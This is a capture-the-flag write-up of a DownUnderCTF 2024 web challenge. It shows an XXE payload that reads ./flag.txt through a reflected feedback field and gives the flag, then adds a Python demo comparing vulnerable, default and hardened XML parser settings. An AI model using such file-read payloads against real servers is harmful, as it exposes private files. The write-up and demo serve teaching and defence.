zoo feedback form

by sealldev
🚩 CTFs DownUnderCTF 2024 web

Description

The zoo wants your feedback! Simply fill in the form, and send away, we'll handle it from there!

Original Writeup on seall.dev

We are given both a web source code zip and an instance.


The form reflects whatever we type back to us, so let's see what is going on in the request when I press Submit Feedback.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<root>
    <feedback>hi!!</feedback>
</root>
```

The request body is XML, which opens up the usual XML attacks, XXE (XML External Entity injection) first among them: if the server's parser resolves external entities declared in a DOCTYPE, an entity whose SYSTEM identifier points at a local file is expanded into the document, and because the feedback element is reflected back to us, the file contents come back in the response. I look at the source code and see we need to read a ./flag.txt.

Following the standard XXE example payloads, I craft a file-read payload that declares an external entity for ./flag.txt and references it inside the reflected element:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "./flag.txt"> ]>
<root>
    <feedback>&example;</feedback>
</root>
```

Let’s try it!

Feedback sent to the Emus: DUCTF{emU_say$_he!!0_h0!@_ci@0}

Flag: DUCTF{emU_say$_he!!0_h0!@_ci@0}
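To see why the payload works and what the fix looks like, here is an added example that is not part of the original writeup or the challenge's code. The server implementation is not shown on this page, so Python's standard-library SAX parser (xml.sax) stands in for it; the flag file, its contents, the request_path location and the parse_feedback/demo helper names are all constructed for this example. Only the two XML documents come from the writeup.

```python
"""Reproduce the XXE file read from the writeup against a local parser.

Added example, not the challenge's own code: Python's stdlib SAX parser
stands in for the unknown server implementation. Flag file, contents and
request location are constructed; the XML documents are the writeup's.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax import handler, xmlreader

# Constructed flag file contents (not the real flag).
FLAG = "DUCTF{constructed_example_flag}"

# The benign request the form sends, as captured in the writeup.
BENIGN_REQUEST = b"""<?xml version="1.0" encoding="UTF-8"?>
<root>
    <feedback>hi!!</feedback>
</root>"""

# The writeup's payload: an external general entity pointing at ./flag.txt,
# referenced inside the element the server reflects back to the client.
XXE_REQUEST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "./flag.txt"> ]>
<root>
    <feedback>&example;</feedback>
</root>"""


class FeedbackHandler(handler.ContentHandler):
    """Collect the character data inside <feedback>, as the server would."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "feedback":
            self._inside = True

    def endElement(self, name):
        if name == "feedback":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self.parts.append(content)


class RejectDoctype:
    """Lexical handler that refuses any document carrying a DTD.

    Disabling entity resolution alone makes the attack fail silently;
    refusing the DOCTYPE tells the client the request was malformed.
    """

    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE is not permitted in feedback submissions")

    def endDTD(self):
        pass

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass


def parse_feedback(xml_bytes, request_path, *, resolve_external=False, reject_dtd=False):
    """Return the <feedback> text of xml_bytes.

    request_path is the constructed location the document is treated as
    coming from; relative SYSTEM ids like ./flag.txt resolve against its
    directory. resolve_external=True is the vulnerable configuration,
    reject_dtd=True the hardened one.
    """
    parser = xml.sax.make_parser()
    # feature_external_ges controls whether external general entities are
    # fetched and expanded; it is off by default in current Python.
    parser.setFeature(handler.feature_external_ges, resolve_external)
    collector = FeedbackHandler()
    parser.setContentHandler(collector)
    if reject_dtd:
        parser.setProperty(handler.property_lexical_handler, RejectDoctype())
    source = xmlreader.InputSource(request_path)
    source.setByteStream(io.BytesIO(xml_bytes))
    parser.parse(source)
    return "".join(collector.parts).strip()


def demo():
    """Run the payload against the three parser configurations."""
    results = {}
    with tempfile.TemporaryDirectory() as workdir:
        with open(os.path.join(workdir, "flag.txt"), "w", encoding="utf-8") as fh:
            fh.write(FLAG)
        # Constructed: the request is treated as living next to flag.txt.
        request_path = os.path.join(workdir, "request.xml")

        # Vulnerable: the entity is fetched and its contents reflected.
        results["vulnerable"] = parse_feedback(
            XXE_REQUEST, request_path, resolve_external=True)
        # Default: the entity is declared but never fetched, so it expands
        # to nothing and the submission "succeeds" with an empty message.
        results["default"] = parse_feedback(XXE_REQUEST, request_path)
        # Hardened: the DOCTYPE is rejected before any entity is seen.
        try:
            parse_feedback(XXE_REQUEST, request_path, reject_dtd=True)
            results["hardened_rejected"] = False
        except ValueError:
            results["hardened_rejected"] = True
        # The hardened parser still accepts the form's normal request.
        results["hardened_benign"] = parse_feedback(
            BENIGN_REQUEST, request_path, reject_dtd=True)
    return results


if __name__ == "__main__":
    for mode, outcome in demo().items():
        print(f"{mode:>17}: {outcome!r}")
```

Run it with python3 and the vulnerable mode returns the flag file's contents exactly as the challenge server did, because ./flag.txt is resolved relative to the document's location, just as the server resolved it relative to its working directory. The default mode is worth noting for defenders: with entity resolution off, the payload is silently accepted and the feedback arrives empty, so nothing in the application log shows an attack was attempted. Rejecting any DOCTYPE up front turns the attempt into a visible parse error while leaving the form's normal requests untouched.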
